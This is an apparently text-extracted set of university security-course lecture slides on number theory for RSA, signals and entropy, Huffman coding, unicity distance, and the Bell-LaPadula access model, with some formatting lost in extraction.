61478881858016233581815507729190060733863810985820998417753776670372
86814739670120315712396914000184822340352355906455155667534102473964
53541377412583676260706359331048403293779053704648771069764131865422
62299505280557584280574185802694213299802280179325494560628948940739
34448228464915119714116869895958794732024285742690180232449402567101
05083114967356334295809219455711191131246974627173111242792554453321
16504914530077241996189357298508605206780120789880835525222341940514
58556732086842042388893209157040799864871901064991230860288657545878
54838031902109935110264503891544145872580747830622294066978047059698
08888224976779404912792017633095411318555938776800816778624695807909\
49705787192596277127796303487781814106147375370904627195995589087276
8469943 mod 13 = 5
CS3235 - Hugh Anderson’s notes. Page number: 130
How did I work that out?
I used bc
An arbitrary precision calculator language
CS3235 - Hugh Anderson’s notes. Page number: 131
Another example
result = 71215 mod 13
CS3235 - Hugh Anderson’s notes. Page number: 132
Another example
result = 71215 mod 13
= 71215 mod 12 mod 13
CS3235 - Hugh Anderson’s notes. Page number: 133
Another example
result = 71215 mod 13
= 71215 mod 12 mod 13
= 73 mod 13
CS3235 - Hugh Anderson’s notes. Page number: 134
Another example
result = 71215 mod 13
= 71215 mod 12 mod 13
= 73 mod 13
= 343 mod 13
CS3235 - Hugh Anderson’s notes. Page number: 135
Another example
result = 71215 mod 13
= 71215 mod 12 mod 13
= 73 mod 13
= 343 mod 13
= 5
CS3235 - Hugh Anderson’s notes. Page number: 136
Summary
We can do BIG NUMBER maths without calculating bignumbers.
CS3235 - Hugh Anderson’s notes. Page number: 137
This session
• Math preliminaries
– Fermat’s little theorem– Euler
CS3235 - Hugh Anderson’s notes. Page number: 138
Euler
The Swiss mathematician Leonhard Euler (1707-1783) dis-covered a generalization of Fermat’s Theorem which willlater be useful in the discussion of the RSA cryptosystem.
CS3235 - Hugh Anderson’s notes. Page number: 139
Euler’s theorem
Theorem (Euler): If n is any positive integer and a is anypositive integer less than n with no divisors in common withn, then
aφ(n) mod n = 1,
where φ(n) is the Euler phi function:
φ(n) = n(1− 1/p1) . . . (1− 1/pm),
and p1, . . . , pm are all the prime numbers that divide evenlyinto n, including n itself in case it is a prime.
CS3235 - Hugh Anderson’s notes. Page number: 140
Special case 1
If n is a prime, then using the formula,
φ(n) = n(1− 1/n) = n(n− 1
n) = n− 1
Fermat’s result is a special case of Euler’s.
aφ(n) mod n = an−1 mod n = 1
CS3235 - Hugh Anderson’s notes. Page number: 141
Special case 2
Another special case needed for RSA comes when themodulus is a product of two primes: n = pq. Then
φ(n) = n(1− 1/p)(1− 1/q) = (p− 1)(q − 1)
CS3235 - Hugh Anderson’s notes. Page number: 142
Special case 2
a(p−1)(q−1) mod pq = 1
• assuming a has no divisors in common with pq
• and p and q are primes
CS3235 - Hugh Anderson’s notes. Page number: 143
Euler: n = 15 and φ(n) = 8
a1 a2 a3 a4 a5 a6 a7 a8 a9 a10 a11 a12 a13 a14
2 4 8 1 2 4 8 1 2 4 8 1 2 4
3 9 12 6 3 9 12 6 3 9 12 6 3 9
4 1 4 1 4 1 4 1 4 1 4 1 4 1
5 10 5 10 5 10 5 10 5 10 5 10 5 10
6 6 6 6 6 6 6 6 6 6 6 6 6 6
7 4 13 1 7 4 13 1 7 4 13 1 7 4
8 4 2 1 8 4 2 1 8 4 2 1 8 4
9 6 9 6 9 6 9 6 9 6 9 6 9 6
10 10 10 10 10 10 10 10 10 10 10 10 10 10
11 1 11 1 11 1 11 1 11 1 11 1 11 1
12 9 3 6 12 9 3 6 12 9 3 6 12 9
13 4 7 1 13 4 7 1 13 4 7 1 13 4
14 1 14 1 14 1 14 1 14 1 14 1 14 1
CS3235 - Hugh Anderson’s notes. Page number: 144
Table
Table illustrates Euler’s theorem for n = 15 = 3 · 5, with
φ(15) = 15 · (1− 1/3) · (1− 1/5) = (3− 1) · (5− 1) = 8
Notice here that a 1 is reached when the power is 8, butonly for numbers with no divisors in common with 15.
For other base numbers, the value never gets to 1.
CS3235 - Hugh Anderson’s notes. Page number: 145
Euler
Arithmetic in the exponent is taken mod φ(n), so that, if ahas no divisors in common with n,
ax mod n = ax mod φ(n) mod n.
If n = 15 as above, then φ(n) = 8, and if neither 3 nor 5divides evenly into a, then φ(n) = 8. Thus for example,
a28 mod 15 = a28mod 8 mod 15 = a4 mod 15.
CS3235 - Hugh Anderson’s notes. Page number: 146
Before we leave Euler...
We are interested in...
Large prime numbers (p, q)
Their product n = pq
The Euler phi function φ(n) = (p− 1)(q − 1)
CS3235 - Hugh Anderson’s notes. Page number: 147
Before we leave Euler...
In a similar fashion to before we can do BIG numberarithmetic easily
Consider also the ease of multiplying, and difficulty offactoring...
CS3235 - Hugh Anderson’s notes. Page number: 148
Before we leave Euler...
29*37=?
CS3235 - Hugh Anderson’s notes. Page number: 149
The Euclidean algorithm
Multiplicative inverse is not intuitive and requires sometheory to compute.
a−1 can be computed efficiently using the extended Eu-clidean algorithm
Law GCD-1:The cryptographer’s first and oldest favorite algorithm is
the extended Euclidean algorithm , which computes the greatestcommon divisor of two positive integers a and b and also sup-plies integers x and y such that x*a + y*b = gcd(a, b) .
CS3235 - Hugh Anderson’s notes. Page number: 150
Finding GCD
• For the gcd of 819 and 462,
– factor the numbers as:∗ 819 = 3 · 3 · 7 · 13∗ 462 = 2 · 3 · 7 · 11
– gcd is 21 = 3 · 7
But there is no efficient algorithm to factor integers.
CS3235 - Hugh Anderson’s notes. Page number: 151
The Euclidean algorithm
1. Repeatedly divide the larger one by the smaller , and
2. Write larger = smaller * quotient + remainder
3. Repeat using the two numbers “smaller ” and “remainder ”.
4. When you get a 0 remainder , then you have the gcd ofthe original two numbers.
CS3235 - Hugh Anderson’s notes. Page number: 152
Example
819 = 462 · 1 + 357 (Step 0)
462 = 357 · 1 + 105 (Step 1)
357 = 105 · 3 + 42 (Step 2)
105 = 42 · 2 + 21 (Step 3, so GCD = 21)
42 = 21 · 2 + 0 (Step 4)
CS3235 - Hugh Anderson’s notes. Page number: 153
The extended Euclidean algorithm
Given the two positive integers 819 and 462, the extendedEuclidean algorithm finds unique integers a and b so that
a · 819 + b · 462 = gcd(819, 462) = 21
In this case,(−9) · 819 + 16 · 462 = 21
(See notes...)
How does this give us a mechanism to calculate the mul-tiplicative inverse of an element?
CS3235 - Hugh Anderson’s notes. Page number: 154
The extended Euclidean algorithm
x ∗ a + y ∗ p = gcd(x, y)
Now - if p is a prime, then gcd(x, y) = 1, and so
x ∗ a + y ∗ p = 1
In the field Zp, this indicates that x ∗ a = 1, and so x = a−1.
The extended Euclidean algorithm has given us a mecha-nism to calculate the multiplicative inverse of an element.
CS3235 - Hugh Anderson’s notes. Page number: 155
Fast integer exponentiation
Law EXP-1:Many cryptosystems in modern cryptography depend on
a fast algorithm to perform integer exponentiation.
Examples in notes... not so important, just nice to know itcan be done.
CS3235 - Hugh Anderson’s notes. Page number: 156
Back to primes
For 2500 years mathematicians studied prime numbers justbecause they were interesting, without any idea they wouldhave practical applications. Possible real-world uses:
1. Sometimes... a prime number of ball bearings arrangedin a bearing, to cut down on periodic wear (also gearteeth).
2. Possibly... the 13 and 17-year periodic emergence of ci-cadas may be due to coevolution with predators (that lostand became extinct).
CS3235 - Hugh Anderson’s notes. Page number: 157
Since 1976
Now finally, in cryptography, prime numbers have come intotheir own.
Law PRIME-1:A source of large random prime integers is an essential
part of many current cryptosystems.
CS3235 - Hugh Anderson’s notes. Page number: 158
Checking for primes
It is hard to check that an integer is “certainly” prime,but...
It is easy to check that an integer is “probably” prime.
Tests to check if a number is probably prime are calledpseudo-prime tests.
CS3235 - Hugh Anderson’s notes. Page number: 159
Prime check
Start with a property of a prime number, such as Fer-mat’s Theorem, mentioned in the previous chapter
if p is a prime and a is any non-zero number less than p,then ap−1 mod p = 1.
If one can find a number a for which Fermat’s Theoremdoes not hold, then the number p in the theorem is defi-nitely not a prime.
If the theorem holds, then p is called a pseudo-prime withrespect to a, and it might actually be a prime.
CS3235 - Hugh Anderson’s notes. Page number: 160
Prime check
So the simplest possible pseudo-prime test would just takea small value of a, say 2 or 3, and check if Fermat’s Theoremis true.
Simple Pseudo-prime Test: If a very large randominteger p (100 decimal digits or more) is not divisibleby a small prime, and if 3p−1 mod p = 1, then the num-ber is prime except for a vanishingly small probability,which one can ignore.
CS3235 - Hugh Anderson’s notes. Page number: 161
Prime check - 1105,1729
One could just repeat the test for other integers besides3 as the base, but unfortunately there are non-primes(called Carmichael numbers) that satisfy Fermat’s the-orem for all values of a even though they are not prime.
Chances of a mistake less than 10−41, in practice usebetter tests
Law PRIME-2:Just one simple pseudo-prime test is enough to test that a
very large random integer is probably prime.
CS3235 - Hugh Anderson’s notes. Page number: 162
Summary of topics
We can do BIG arithmetic in these fields
We can do fast exponentiation and modulo arithmetic
We can check for primes
CS3235 - Hugh Anderson’s notes. Page number: 163
Chapter 4
Lecture 4 - Preliminaries
CS3235 - Hugh Anderson’s notes. Page number: 164
Chocolate fish people
Andreas Schuth
Chong Jun Yong
Ashley Ng *
Wu Yongzheng *
Zhang Huaixing *
Terence Sangeet
CS3235 - Hugh Anderson’s notes. Page number: 165
The extended Euclidean algorithm
x ∗ a + y ∗ p = gcd(x, y)
Now - if p is a prime, then gcd(x, y) = 1, and so
x ∗ a + y ∗ p = 1
WRONG!
CS3235 - Hugh Anderson’s notes. Page number: 166
The extended Euclidean algorithm
x ∗ a + y ∗ p = gcd(a, p)
Now - if p is a prime, then gcd(a, p) = 1, and so
x ∗ a + y ∗ p = 1
RIGHT!
CS3235 - Hugh Anderson’s notes. Page number: 167
Last session
• Math preliminaries
– Fermat’s little theorem– Euler
CS3235 - Hugh Anderson’s notes. Page number: 168
This session
• Physical preliminaries
• Entropy
CS3235 - Hugh Anderson’s notes. Page number: 169
This session
• Physical preliminaries
• Entropy
CS3235 - Hugh Anderson’s notes. Page number: 170
Preliminaries - physical
Consider:
• Is the data analog or digital?
• What limits are placed on it?
• How is it to be transmitted?
• How can you be sure that it is correct/accurate?
CS3235 - Hugh Anderson’s notes. Page number: 171
Analog and digital
-1
0
1
2
3
4
5
-10 -8 -6 -4 -2 0 2 4 6 8 10
sin(x)+4(sin(x)>=0)+1
real(int(sin(x)*5))/10
The plot is amplitude versus time .
CS3235 - Hugh Anderson’s notes. Page number: 172
Analog and digital
Repetition rate (if it repeats) is called the frequency , andis measured in Hertz
The peak to peak signal level is called the amplitude.
The simplest analog signal is called the sine wave.
By mixing we may create any desired periodic waveform.
CS3235 - Hugh Anderson’s notes. Page number: 173
Analog and digital
-1
0
1
2
3
4
5
-10 -8 -6 -4 -2 0 2 4 6 8 10
sin(x)+4(sin(3*x)/3)+2
sin(x)+(sin(3*x)/3)
The plot is amplitude versus time . (Time domain)
CS3235 - Hugh Anderson’s notes. Page number: 174
Analog and digital
0.20.333
1.0
f 3f 5f
The plot is amplitude vs frequency . (Frequency domain).
CS3235 - Hugh Anderson’s notes. Page number: 175
Analog and digital
If we were to continue in the same progression, the resultantwaveform would be a square wave:
∞∑n=1
1n
sin(2πnf) (for odd n) ⇒ square wave, frequency f
This representation method is known as Fourier Analysisafter Jean-Baptiste Fourier.
CS3235 - Hugh Anderson’s notes. Page number: 176
Fourier analysis
4
π(sin(2πft) +
1
3sin(6πft) +
1
5sin(10πft) +
1
7sin(14πft) + ...)
3
4
5
6
7
8
9
10
11
-10 -8 -6 -4 -2 0 2 4 6 8 10
sin(x)+10sin(x)+(sin(3*x)/3)+8
sin(x)+(sin(3*x)/3)+(sin(5*x)/5)+6sin(x)+(sin(3*x)/3)+(sin(5*x)/5)+(sin(7*x)/7)+4
CS3235 - Hugh Anderson’s notes. Page number: 177
Fourier analysis
Transformation between equivalent time domain and fre-quency domain representations.
A piecewise continuously differentiable periodic func-tion in the time domain may be transformed to a dis-crete aperiodic function in the frequency domain.
smooth, repeating ↔ pointy, notrepeating
f(t) ↔ F (ω)
CS3235 - Hugh Anderson’s notes. Page number: 178
Fourier analysis
Time domain Frequency domain Description
Continuous, periodic À Discrete, aperiodic Fourier series
Continuous, aperiodic À Continuous, aperiodic Fourier transform
Discrete, periodic À Discrete, periodic Discrete Fourier series
Discrete, aperiodic À Continuous, periodic Discrete Fourier transform
CS3235 - Hugh Anderson’s notes. Page number: 179
Accuracy
Relationship between the bandwidth of a channel, and howaccurate a signal is.
Another way of stating this is to point out that the higherfrequency components are important - they are needed tore-create the original signal faithfully. If we had two 1,000Hzsignals, one a triangle, one a square wave - if they wereboth passed through the 1,000Hz bandwidth limited channelabove, they would look identical (a sine wave).
CS3235 - Hugh Anderson’s notes. Page number: 180
Example transforms
f(t)
t
F( )ω
ω
CS3235 - Hugh Anderson’s notes. Page number: 181
Example transforms
ω
ωF( )
f(t)
t
CS3235 - Hugh Anderson’s notes. Page number: 182
Example transforms
t
ω
F( )ω
f(t)
CS3235 - Hugh Anderson’s notes. Page number: 183
Example transforms
t
ω
F( )ω
f(t)
CS3235 - Hugh Anderson’s notes. Page number: 184
Convolution
The Fourier transform of the convolution f(t) ? g(t) isthe product of the Fourier transforms of the functionsF (ω) and G(ω), and vice versa.
f(t) ? g(t) ↔ F (ω)×G(ω)
f(t)× g(t) ↔ F (ω) ? G(ω
We can use convolution to easily predict the functions thatresult from complex signal filtering or sampling.
CS3235 - Hugh Anderson’s notes. Page number: 185
Convolution
g(t) G( )ω
F( ) * G( )f(t).g(t) ω
t ω
t ω
ω
f(t) F( )ω
ωt
CS3235 - Hugh Anderson’s notes. Page number: 186
Modulation
A baseband signal is one in which the data is directly con-verted to a signal and transmitted. When the signal is im-posed on another signal, the process is called modulation.
We may modulate for several reasons:
• The media may not support the baseband signal
• We may wish to use a single transmission medium totransport many signals
CS3235 - Hugh Anderson’s notes. Page number: 187
Modulation methods
• Frequency modulation - frequency shift keying (FSK)
• Amplitude modulation
• Phase modulation - phase shift keying (PSK)
• Combinations of the above (QAM)
CS3235 - Hugh Anderson’s notes. Page number: 188
Baseband digital encoding
The simplest encoding scheme is just to use a low level fora zero bit, and a high level for a one bit. As long as bothends of a channel are synchronized in some manner, wecan transfer data.
On the other hand, if the ends of the channel are not syn-chronized we might use a simple encoding scheme, such asBipolar or Manchester encoding, to transfer synchronizing(clock) information on the same channel.
CS3235 - Hugh Anderson’s notes. Page number: 189
Baseband digital encoding
Bipolar
BITS
TIME
CODE
CLOCK
RECVD
Manchester
BITS
TIME
CODE
CLOCK
RECVD
In Bipolar encoding, a 1 is transmitted with a positivepulse, a 0 with a negative pulse. Sometimes called re-turn to zero encoding.
In Manchester encoding, there is a transition in the cen-ter of each bit cell.
CS3235 - Hugh Anderson’s notes. Page number: 190
Summary
Data commonly transferred digitally
Trade-off between bandwidth, accuracy of any signal
CS3235 - Hugh Anderson’s notes. Page number: 191
Information theory
The term information is commonly understood. Considerthe following two sentences:
1. The sun will rise tomorrow.
2. The Fiji rugby team will win against the All Blacks (NewZealand rugby team) the next time they play.
Question: Which sentence contains the most information?
CS3235 - Hugh Anderson’s notes. Page number: 192
Information theory
Temperature today is OK, Temperature today is OK, Tem-perature today is OK, Temperature today is OK, Temper-ature today is OK, Temperature today is OK, Tempera-ture today is OK, Temperature today is OK, Temperaturetoday is OK, Temperature today is OK, ...
... total information here is close to zero!
?
More information means less predictable
Less information means more predictable
CS3235 - Hugh Anderson’s notes. Page number: 193
Information theory
Nyquist (1924) and Hartley (1928) laid the foundations:
Hartley showed that the information content is propor-tional to the logarithm of the number of possible mes-sages. Integers between 1 and n need log2 n bits.
Shannon developed a mathematical treatment of com-munication and information in an important paper at
http://cm.bell-labs.com/cm/ms/what/shannonday/paper.html
CS3235 - Hugh Anderson’s notes. Page number: 194
Information theory model
ReceiverSourceInformation
TransmitterDestination
Channel
SourceNoise
(or sink)
The relevance of Shannon to secrecy is in another importantpaper at
http://www.cs.ucla.edu/˜jkong/research/security/shannon.html
CS3235 - Hugh Anderson’s notes. Page number: 195
Entropy
In our communication model, the units of transmission arecalled messages, constructed from an alphabet of (say) nsymbols x ∈ x1, . . . , xn each with a probability of trans-mission Px.
We associate with each symbol x a quantity Hx which is ameasure of the information associated with that symbol.
Hx = Px log2
1Px
CS3235 - Hugh Anderson’s notes. Page number: 196
Entropy
Hx = Px log2
1Px
If the probability of occurence of each symbol is the same,we can derive Hartley’s result, that the average amount ofinformation transmitted in a single symbol (the source en-tropy) is
H(X) = log2 n
where X is a label referring to each of the source symbolsx1, . . . , xn.
CS3235 - Hugh Anderson’s notes. Page number: 197
Entropy units
Our units for entropy can be bits/second or bits/symbol , andwe also sometimes use unit-less relative entropy measures(relative to the entropy of the system if all symbols wereequally likely).
CS3235 - Hugh Anderson’s notes. Page number: 198
Entropy - same probability
Symbols Entropy of each symbol Bits needed2 Hx = 1
2log22 = 12 2 ∗ 1
2 = 14 Hx = 1
4log24 = 12 4 ∗ 1
2 = 28 Hx = 1
8log28 = 38 8 ∗ 3
8 = 316 Hx = 1
16log216 = 416 16 ∗ 4
16 = 421 Hx = 1
21log221 = 4.3921 21 ∗ 4.39
21 = 4.39
CS3235 - Hugh Anderson’s notes. Page number: 199
Entropy - different probability
However, if the probability of occurence of each symbol isnot the same, we derive the following result, that the sourceentropy is
H(X) =n∑
i=1
Pxilog2
1Pxi
Shannon’s paper shows that H determines the channel ca-pacity required to transmit the desired information with themost efficient coding scheme.
CS3235 - Hugh Anderson’s notes. Page number: 200
Entropy - different probability
If we had a source emitting two symbols, 0 and 1, with prob-abilities of 1 and 0, then the entropy of the source is
H(X) =n∑
i=1
Pxilog2
1Pxi
= log2 1 + 0 ∗ log2 0
= 0 bits/symbol
CS3235 - Hugh Anderson’s notes. Page number: 201
Entropy - different probability
If we were transmitting a sequence of letters A,B,C,D,E andF with probabilities 1
2,14, 116, 1
16, 116 and 1
16, the entropy for thesystem is
H(X) =12
log2 2 +14
log2 4 +416
log2 16
= 0.5 + 0.5 + 1.0
= 2 bits/symbol
CS3235 - Hugh Anderson’s notes. Page number: 202
Encoding the letters
A fixed size 3-bit code, and then a more complex code:
Symbol 3-bit code Complex code
A 000 0
B 001 10
C 010 1100
D 011 1101
E 100 1110
F 101 1111
CS3235 - Hugh Anderson’s notes. Page number: 203
Analysis of encoding
The average length of the binary digits needed to encode atypical sequence of symbols using the 3-bit code is
L(X) =
nXi=1
Pxi • sizeof(xi)
=1
2∗ 3 +
1
4∗ 3 +
4
16∗ 3
= 1.5 + 0.75 + 0.75
= 3 bits/symbol
CS3235 - Hugh Anderson’s notes. Page number: 204
Analysis of encoding
The average length of the binary digits needed to encode atypical sequence of symbols using the complex encoding is
L(X) =
nXi=1
Pxi • sizeof(xi)
=1
2∗ 1 +
1
4∗ 2 +
4
16∗ 4
= 0.5 + 0.5 + 1.0
= 2 bits/symbol
i.e. it is more efficient, averaging only 2 bits for each symboltransmitted.
CS3235 - Hugh Anderson’s notes. Page number: 205
Entropy and transmission rate
If our source was transmitting 0 and 1 bits with equal proba-bility, but the received data was corrupted 50% of the time,we might reason that our rate r(X) of information transmis-sion was 0.5, because half of our data is getting throughcorrectly.
ReceiverSourceInformation
TransmitterDestination
Channel
SourceNoise
(or sink)
CS3235 - Hugh Anderson’s notes. Page number: 206
Entropy and transmission rate
However, a better argument is to consider the difference be-tween the entropy of the source and the conditional entropyof the received data:
r(X) = H(X)−H(X | y)
where H(X | y) is the conditional entropy of the receiveddata.
CS3235 - Hugh Anderson’s notes. Page number: 207
Entropy and transmission rate
H(X | y) = 0.5 ∗ log2 2 + 0.5 ∗ log2 2
= 1
and H(X) = 1 (shown before)
so r(X) = H(X)−H(X | y)
= 0 bits/symbol
This is a much better measure of the amount of informationtransmitted.
CS3235 - Hugh Anderson’s notes. Page number: 208
Redundancy
The ratio of the entropy of a source H(X) to what it wouldbe if the symbols had equal probabilities H ′(X), is calledthe relative entropy. We use the notation Hr(X), and
Hr(X) =H(X)
H ′(X)
The redundancy of the source is 1−Hr(X)
R(X) = 1−Hr(X)
CS3235 - Hugh Anderson’s notes. Page number: 209
Redundancy
If we look at English text a symbol at a time1, the redun-dancy is about 0.7.
This indicates that it should be simple to compress En-glish text by about 70%.
This sort of redundancy is a unitless relative redundancy
1That is, without considering letter sequences.
CS3235 - Hugh Anderson’s notes. Page number: 210
Unicity distance
Defined by Shannon - an approximation to the amount ofciphertext such that the the sum of the source entropy andthe encryption key entropy is the same as the number ofciphertext bits used.
Ciphertexts longer have only one meaningful decryption
Ciphertexts shorter may have more than one meaningfuldecryption (and hence be stronger, as a hacker will notknow which one is correct)
CS3235 - Hugh Anderson’s notes. Page number: 211
Unicity distance
The longer the unicity distance, the better the cryptosys-tem
Unicity distance U is the entropy of the key divided bythe redundancy of the source, and is approximately
U ≈ log2K
R log2P
(K is the key size, R is the redundancy, P is the number ofsymbols).
CS3235 - Hugh Anderson’s notes. Page number: 212
Unicity distance
26 letter alphabet, and 26! keys
U ≈ log226!0.5 log226
≈ 880.7 ∗ 4.7
≈ 27
So given a ciphertext of 27 symbols, a unique decoding ispossible.
CS3235 - Hugh Anderson’s notes. Page number: 213
Unicity distance
In general
Longer key length then longer unicity distance
Redundancy inversely proportional to unicity distance
Estimates the minimum amount of ciphertext for whichthere is only a single plaintext solution on doing a bruteforce attack...
CS3235 - Hugh Anderson’s notes. Page number: 214
Chapter 5
Lecture 5 - Preliminaries
CS3235 - Hugh Anderson’s notes. Page number: 215
Last session
• Physical preliminaries
• Entropy
CS3235 - Hugh Anderson’s notes. Page number: 216
This session
• Channel properties
• Entropy
• Models
CS3235 - Hugh Anderson’s notes. Page number: 217
Hugh’s bigger mistakes...
CS3235 - Hugh Anderson’s notes. Page number: 218
Incorrect
0.20.333
1.0
f 3f 5f
The plot is frequency vs time . (Frequency domain).
CS3235 - Hugh Anderson’s notes. Page number: 219
Correct
0.20.333
1.0
f 3f 5f
The plot is amplitude vs frequency . (Frequency domain).
CS3235 - Hugh Anderson’s notes. Page number: 220
Incorrect
If we had a source emitting two symbols, 0 and 1, with prob-abilities of 1 and 0, then the entropy of the source is
H(X) =n∑
i=1
Pxilog2
1Pxi
= log2 1 + 0 ∗ log2 0
= 0 bits/symbol
CS3235 - Hugh Anderson’s notes. Page number: 221
Correct
If we had a source emitting two symbols, 0 and 1, with prob-abilities of 1 and 0, then the entropy of the source is
H(X) =
nXi=1
Pxi log21
Pxi
= 1 ∗ log2 1 + 0 ∗ log21
0
= 0 bits/symbol
Note thatlimy→0
y log21
y= 0
CS3235 - Hugh Anderson’s notes. Page number: 222
Page 46 of notes
The first two equations that begin H(X) should begin withL(X).
L(X) =
nXi=1
Pxi • sizeof(xi)
=1
2∗ 3 +
1
4∗ 3 +
4
16∗ 3
= 1.5 + 0.75 + 0.75
= 3 bits/symbol
CS3235 - Hugh Anderson’s notes. Page number: 223
1/2 of data through correctly...
Received data is corrupted 50% of the time:
Before After
CS3235 - Hugh Anderson’s notes. Page number: 224
Convolution
Applet to do convolution:http://www.cs.brown.edu/exploratories/freeSoftware/repository/edu/brown/cs/exploratories/
applets/convolution/convolution java browser.html
CS3235 - Hugh Anderson’s notes. Page number: 225
This session
• Channel properties
• Entropy
• Security models
CS3235 - Hugh Anderson’s notes. Page number: 226
Shannon and Nyquist
ReceiverSourceInformation
TransmitterDestination
Channel
SourceNoise
(or sink)
Maximum BPS = W log2(1 + SN ) bits/sec
CS3235 - Hugh Anderson’s notes. Page number: 227
Shannon and Nyquist example
If we had a telephone system with a bandwidth of 3,000 Hz,and a S/N of 30db (about 1024:1)
D = 3000 ∗ log2 1025
≈ 3000 ∗ 10
≈ 30000 bps
This is a typical maximum bit rate achievable over the tele-phone network.
CS3235 - Hugh Anderson’s notes. Page number: 228
Nyquist
The maximum data rate over a limited bandwidth (W) chan-nel with V discrete levels is:
Maximum data rate = 2W log2 V bits/sec
For example, two-Level data cannot be transmitted overthe telephone network faster than 6,000 BPS, because thebandwidth of the telephone channel is only about 3,000Hz.
CS3235 - Hugh Anderson’s notes. Page number: 229
Nyquist example
If we had a telephone system with a bandwidth of 3,000 Hz,and using 256 levels
D = 2 ∗ 3000 ∗ log2 256
= 6000 ∗ 8
= 48000 bps
In these equations, the assumption is that the relative en-tropies of the signal and noise are a maximum (that they arerandom).
CS3235 - Hugh Anderson’s notes. Page number: 230
This session
• Channel properties
• Entropy
• Security models
CS3235 - Hugh Anderson’s notes. Page number: 231
Maximum entropy
In practical systems, signals rarely have maximum entropy,and we can do better - there may be methods to compressthe data2.
2Note: we must also differentiate between lossy and lossless compressionschemes. A signal with an entropy of 0.5 may not be compressed more than 2:1 un-less you use a lossy compression scheme. JPEG and Wavelet compression schemescan achieve huge data size reductions without visible impairment of images, but therestored images are not the same as the original ones - they just look the same. Thelossless compression schemes used in PkZip, gzip or GIF files (LZW) cannot achievecompression ratios as high as that found in JPEG.
CS3235 - Hugh Anderson’s notes. Page number: 232
Huffman encoding
An immediate question of interest is “What is the minimumlength bit string that may be used to compress a string ofsymbols?”.
The Huffman encoding minimizes the bit length given thefrequency of occurence of each symbol3. The resultant bitstring in the best case will be the length predicted from thecalculation of the source entropy.
3Note that it presupposes knowledge about these frequencies.
CS3235 - Hugh Anderson’s notes. Page number: 233
Huffman encoding
How can we get knowledge about the frequency of (say)the letters in the English language?
(answer) - we read snapple bottle tops...
CS3235 - Hugh Anderson’s notes. Page number: 234
Huffman encoding
1
1
1
1
0 1
0
A O N S
T
0
0 0E
Less common characters use longer bit strings.
CS3235 - Hugh Anderson’s notes. Page number: 235
Huffman encoding
Our algorithm for encoding is simple - we calculate the treeencoding knowing the frequency of each letter:
Symbol Coding
E 00
T 10
A 010
O 011
N 110
S 111
To decode, traverse the tree taking a left or right path ac-cording to the bit. The leaf has our symbol.
CS3235 - Hugh Anderson’s notes. Page number: 236
Case study - MNP5 and V.42bis
MNP5 and V42.bis are compression schemes commonlyused on modems.
MNP5 suffers from the unfortunate property that it will ex-pand data with maximum or near-maximum entropy (in-stead of compression).
V42.bis does not have this property - it uses a large dictio-nary, and will not try to compress an already compressedstream.
CS3235 - Hugh Anderson’s notes. Page number: 237
MNP5
MNP5 uses two different compression methods, switchingbetween them as appropriate. The methods are:
• Adaptive frequency encoding
• Run-length encoding
Run length encoding sends the bytes with a byte countvalue, and doubles the size of a data stream with maximumentropy.
CS3235 - Hugh Anderson’s notes. Page number: 238
Adaptive frequency encoding
3-bit header Body size Total code size Number of codewords
000 1 bit 4 bits 2
001 1 bit 4 bits 2
010 2 bits 5 bits 4
011 3 bits 6 bits 8
100 4 bits 7 bits 16
101 5 bits 8 bits 32
110 6 bits 9 bits 64
111 7 bits 10 bits 128
34 of our codewords are larger than they would be if we didnot use this encoding scheme
CS3235 - Hugh Anderson’s notes. Page number: 239
Further study
• Textbook Chapter 32
• Shannon’s paper on secrecy systems athttp://www.cs.ucla.edu/˜jkong/research/security/shannon.html.
CS3235 - Hugh Anderson’s notes. Page number: 240
This session
• Channel properties
• Entropy
• Security models
CS3235 - Hugh Anderson’s notes. Page number: 241
Preliminaries - security models
Definition: a range of formal policies for specifying the se-curity of a system in terms of a (mathematical) model.
access control matrix
Bell-LaPadula
Biba
Clark-Wilson
CS3235 - Hugh Anderson’s notes. Page number: 242
Security model
Have a model
Determine properties
Verify implementations
CS3235 - Hugh Anderson’s notes. Page number: 243
Access control matrix
Rows of the matrix are subjects, columns are objects:
Objects
Subjects
f1 f2 f3 f4
s1 read
execute
execute
s2 write read execute
s3 read write execute
s4 read write read
s4 cannot read f1. But subjects may collude...
CS3235 - Hugh Anderson’s notes. Page number: 244
Bell-LaPadula, confidentiality
Military style to assure confidentiality services.
Security levels in a (total) ordering formalizing a policywhich restricts information flow from a higher securitylevel to a lower security level.
Lower-level subjects from accessing higher-level objects.
Section 5.2 in textbook
CS3235 - Hugh Anderson’s notes. Page number: 245
Bell-LaPadula, levels
1. Top secret (T )
2. Secret (S)
3. Confidential (C)
4. Unclassified (U )
where T > S > C > U . Access operations visualized usingan access control matrix, and are drawn from read , write .
CS3235 - Hugh Anderson’s notes. Page number: 246
BLP security property
The clearance classification for a subject s ∈ S or objecto ∈ O is denoted L(s) = ls or L(o) = lo. We might thenassume we can use this to construct a first simple securityproperty:
• No read-up-1 : s can read o if and only if lo ≤ ls, and shas read access in the access control matrix.
This single property is insufficient to ensure the restrictionwe need for the security policy.
CS3235 - Hugh Anderson’s notes. Page number: 247
BLP Trojan Horse property
Consider the case when a low security subject creates ahigh security object (say a program) which then reads a highsecurity file, copying it to a low security one. This behaviouris commonly called a Trojan Horse. A second property isneeded:
• No write-down-1 : s can write o if and only if ls ≤ lo, ands has write access in the access control matrix.
These two properties can be used to enforce our securitypolicy, but with a severe restriction. For example, how doesany subject write down without invalidating a security pol-icy?
CS3235 - Hugh Anderson’s notes. Page number: 248
BLP extended
A security category c ∈ C is used to classify objects in themodel, with any object belonging to a set of categories.Each pair (l × c) is termed a security level, and forms alattice.
Lattice - chapter 30 in textbook
CS3235 - Hugh Anderson’s notes. Page number: 249
BLP extended
We define a relation between security levels:
• The security level (l, c) dominates (l′, c′) (written(l, c) dom (l′, c′)) iff l′ ≤ l, and c′ ⊆ c.
A subject s and object o then belong to one of these securitylevels.
CS3235 - Hugh Anderson’s notes. Page number: 250
BLP extended
The new properties are:
• No read-up-2: s can read o if and only if s dom o, and shas read access in the access control matrix.
• No write-down-2: s can write o if and only if o dom s,and s has write access in the access control matrix.
CS3235 - Hugh Anderson’s notes. Page number: 251
BLP security
A system is considered secure in the current state if allthe current accesses are permitted by the two properties.
A transition from one state to the next is considered se-cure if it goes from one secure state to another securestate.
The basic security theorem stated in Theorem 5-2 in thetextbook states that if the initial state of a system is se-cure, and if all state transitions are secure, then the sys-tem will always be secure.
CS3235 - Hugh Anderson’s notes. Page number: 252
BLP example
From textbook, p128:
DG UNIX uses access controls and BLP-like behaviour
CS3235 - Hugh Anderson’s notes. Page number: 253
BLP limits
